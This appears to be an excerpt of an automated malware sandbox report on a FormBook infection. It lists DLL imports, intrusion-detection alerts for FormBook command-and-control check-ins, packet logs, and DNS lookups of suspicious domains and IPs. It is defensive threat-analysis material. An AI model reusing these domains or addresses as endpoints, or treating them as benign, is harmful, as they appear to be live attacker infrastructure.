SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-07T07:00:32.905597+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49738 | 154.215.72.110 | 80 | TCP
2024-12-07T07:01:06.875724+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49819 | 116.50.37.244 | 80 | TCP
2024-12-07T07:02:30.424909+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49874 | 85.159.66.93 | 80 | TCP
2024-12-07T07:02:45.221540+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49987 | 91.195.240.94 | 80 | TCP
2024-12-07T07:03:09.133637+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | TCP
2024-12-07T07:03:24.769279+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49995 | 195.110.124.133 | 80 | TCP
2024-12-07T07:03:56.385111+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49999 | 217.196.55.202 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Dec 7, 2024 07:01:26.556937933 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:27.952920914 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:28.073523998 CET804986685.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:28.075037956 CET4986680192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:28.971993923 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.093441963 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:01:29.093527079 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.095707893 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:01:29.215578079 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.422030926 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.422172070 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:30.424909115 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:02:30.433018923 CET4987480192.168.2.585.159.66.93
                                                                                  Dec 7, 2024 07:02:30.552845955 CET804987485.159.66.93192.168.2.5
                                                                                  Dec 7, 2024 07:02:35.815942049 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:35.935673952 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:35.935894966 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:35.940668106 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:36.060373068 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213833094 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213860035 CET804998491.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:37.213947058 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:37.451513052 CET4998480192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.469856977 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.589778900 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:38.589859009 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.592127085 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:38.711905956 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.868596077 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.868693113 CET804998591.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:39.871151924 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:40.111032009 CET4998580192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.127723932 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.247766018 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:41.247865915 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.250171900 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:41.369915962 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:41.370012999 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527017117 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527117014 CET804998691.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:42.527173042 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:42.764019966 CET4998680192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.784548998 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.904392004 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:43.909183025 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:43.913047075 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:44.032879114 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221385956 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221416950 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221430063 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221529007 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221539974 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221539974 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221553087 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221590996 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221609116 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221679926 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221693039 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221705914 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221719027 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.221739054 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.221755981 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.341567039 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.341628075 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.341742039 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.345868111 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.388940096 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.413263083 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.413279057 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.413397074 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.417541027 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.417587996 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.417661905 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.425878048 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.425950050 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.426037073 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.434325933 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.434436083 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:45.434520960 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.437052011 CET4998780192.168.2.591.195.240.94
                                                                                  Dec 7, 2024 07:02:45.556699991 CET804998791.195.240.94192.168.2.5
                                                                                  Dec 7, 2024 07:02:59.688719034 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:02:59.808722973 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:02:59.815210104 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:02:59.894686937 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:00.014550924 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062185049 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062391996 CET804998866.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:01.062444925 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:01.420447111 CET4998880192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.438908100 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.558778048 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:02.558872938 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.594657898 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:02.714881897 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.787285089 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.787492990 CET804998966.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:03.789294958 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:04.115751028 CET4998980192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.133518934 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.253448963 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:05.253566980 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.255558968 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:05.375405073 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:05.375489950 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501502991 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501637936 CET804999066.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:06.501744032 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:06.764190912 CET4999080192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.785252094 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.905050993 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:07.905198097 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:07.907162905 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:08.027019978 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133428097 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133590937 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:09.133636951 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:09.136701107 CET4999180192.168.2.566.29.149.46
                                                                                  Dec 7, 2024 07:03:09.257195950 CET804999166.29.149.46192.168.2.5
                                                                                  Dec 7, 2024 07:03:15.108252048 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.228236914 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:15.228353977 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.262001991 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:15.381815910 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.540817976 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.540941954 CET8049992195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:16.541165113 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:16.764290094 CET4999280192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:17.825767040 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:17.945573092 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:17.951831102 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:18.067347050 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:18.187212944 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260643005 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260844946 CET8049993195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:19.260893106 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:19.592535973 CET4999380192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.622262955 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.742337942 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:20.742453098 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.789870024 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:20.910049915 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:20.910084963 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.163995028 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.164211988 CET8049994195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:22.164326906 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:22.311238050 CET4999480192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.337935925 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.457896948 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:23.457982063 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.461193085 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:23.581078053 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769037962 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769234896 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:24.769279003 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:24.771866083 CET4999580192.168.2.5195.110.124.133
                                                                                  Dec 7, 2024 07:03:24.891592026 CET8049995195.110.124.133192.168.2.5
                                                                                  Dec 7, 2024 07:03:47.056205034 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.175944090 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:47.176027060 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.178399086 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:47.298177958 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.373049021 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.373591900 CET8049996217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:48.375886917 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:48.686845064 CET4999680192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.711129904 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.831012011 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:49.831192017 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.835768938 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:49.955672979 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029675961 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029900074 CET8049997217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:51.029968977 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:51.342700005 CET4999780192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.361726046 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.484250069 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:52.484400034 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.489723921 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:52.609568119 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:52.609941006 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.681307077 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.681364059 CET8049998217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:53.685746908 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:54.049747944 CET4999880192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.064641953 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.184453011 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:55.184561968 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.187002897 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:55.306890011 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.384815931 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.384907007 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.385111094 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.385181904 CET8049999217.196.55.202192.168.2.5
                                                                                  Dec 7, 2024 07:03:56.385272026 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.387691021 CET4999980192.168.2.5217.196.55.202
                                                                                  Dec 7, 2024 07:03:56.507512093 CET8049999217.196.55.202192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 7, 2024 07:00:29.009788036 CET | 59904 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:00:29.998707056 CET | 59904 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:00:31.014116049 CET | 59904 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:00:31.281286955 CET | 53 | 59904 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:00:31.281318903 CET | 53 | 59904 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:00:31.281330109 CET | 53 | 59904 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:00:47.954760075 CET | 64535 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:00:48.511384010 CET | 53 | 64535 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:00:56.563982964 CET | 53552 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:00:57.270502090 CET | 53 | 53552 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:01:11.899816990 CET | 53400 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:01:12.153143883 CET | 53 | 53400 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:01:20.229412079 CET | 63113 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:01:20.977943897 CET | 53 | 63113 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:02:35.439585924 CET | 51156 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:02:35.809851885 CET | 53 | 51156 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:02:50.594393015 CET | 54256 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:02:50.828432083 CET | 53 | 54256 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:02:58.908297062 CET | 57083 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:02:59.466309071 CET | 53 | 57083 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:03:14.145320892 CET | 59082 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:03:15.088314056 CET | 53 | 59082 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:03:29.799896955 CET | 55290 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:03:29.979104996 CET | 53 | 55290 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:03:38.269126892 CET | 57024 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:03:38.490912914 CET | 53 | 57024 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:03:46.549257994 CET | 50660 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:03:47.052993059 CET | 53 | 50660 | 1.1.1.1 | 192.168.2.5
Dec 7, 2024 07:04:01.393865108 CET | 52512 | 53 | 192.168.2.5 | 1.1.1.1
Dec 7, 2024 07:04:01.620595932 CET | 53 | 52512 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 7, 2024 07:00:29.009788036 CET | 192.168.2.5 | 1.1.1.1 | 0xac | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:29.998707056 CET | 192.168.2.5 | 1.1.1.1 | 0xac | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:31.014116049 CET | 192.168.2.5 | 1.1.1.1 | 0xac | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:47.954760075 CET | 192.168.2.5 | 1.1.1.1 | 0xacbd | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:56.563982964 CET | 192.168.2.5 | 1.1.1.1 | 0xd487 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:01:11.899816990 CET | 192.168.2.5 | 1.1.1.1 | 0xe970 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:01:20.229412079 CET | 192.168.2.5 | 1.1.1.1 | 0x494e | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:35.439585924 CET | 192.168.2.5 | 1.1.1.1 | 0x777a | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:50.594393015 CET | 192.168.2.5 | 1.1.1.1 | 0x583f | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:58.908297062 CET | 192.168.2.5 | 1.1.1.1 | 0x84a2 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:14.145320892 CET | 192.168.2.5 | 1.1.1.1 | 0xf132 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:29.799896955 CET | 192.168.2.5 | 1.1.1.1 | 0xf675 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:38.269126892 CET | 192.168.2.5 | 1.1.1.1 | 0x35b0 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:46.549257994 CET | 192.168.2.5 | 1.1.1.1 | 0x712a | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:04:01.393865108 CET | 192.168.2.5 | 1.1.1.1 | 0x76be | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 7, 2024 07:00:31.281286955 CET | 1.1.1.1 | 192.168.2.5 | 0xac | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:31.281318903 CET | 1.1.1.1 | 192.168.2.5 | 0xac | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:31.281330109 CET | 1.1.1.1 | 192.168.2.5 | 0xac | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:48.511384010 CET | 1.1.1.1 | 192.168.2.5 | 0xacbd | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:00:57.270502090 CET | 1.1.1.1 | 192.168.2.5 | 0xd487 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:01:12.153143883 CET | 1.1.1.1 | 192.168.2.5 | 0xe970 | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:01:20.977943897 CET | 1.1.1.1 | 192.168.2.5 | 0x494e | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2024 07:01:20.977943897 CET | 1.1.1.1 | 192.168.2.5 | 0x494e | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2024 07:01:20.977943897 CET | 1.1.1.1 | 192.168.2.5 | 0x494e | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:35.809851885 CET | 1.1.1.1 | 192.168.2.5 | 0x777a | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:50.828432083 CET | 1.1.1.1 | 192.168.2.5 | 0x583f | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:02:59.466309071 CET | 1.1.1.1 | 192.168.2.5 | 0x84a2 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:15.088314056 CET | 1.1.1.1 | 192.168.2.5 | 0xf132 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Dec 7, 2024 07:03:15.088314056 CET | 1.1.1.1 | 192.168.2.5 | 0xf132 | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:29.979104996 CET | 1.1.1.1 | 192.168.2.5 | 0xf675 | Name error (3) | www.donnavariedades.com | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:38.490912914 CET | 1.1.1.1 | 192.168.2.5 | 0x35b0 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Dec 7, 2024 07:03:47.052993059 CET | 1.1.1.1 | 192.168.2.5 | 0x712a | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
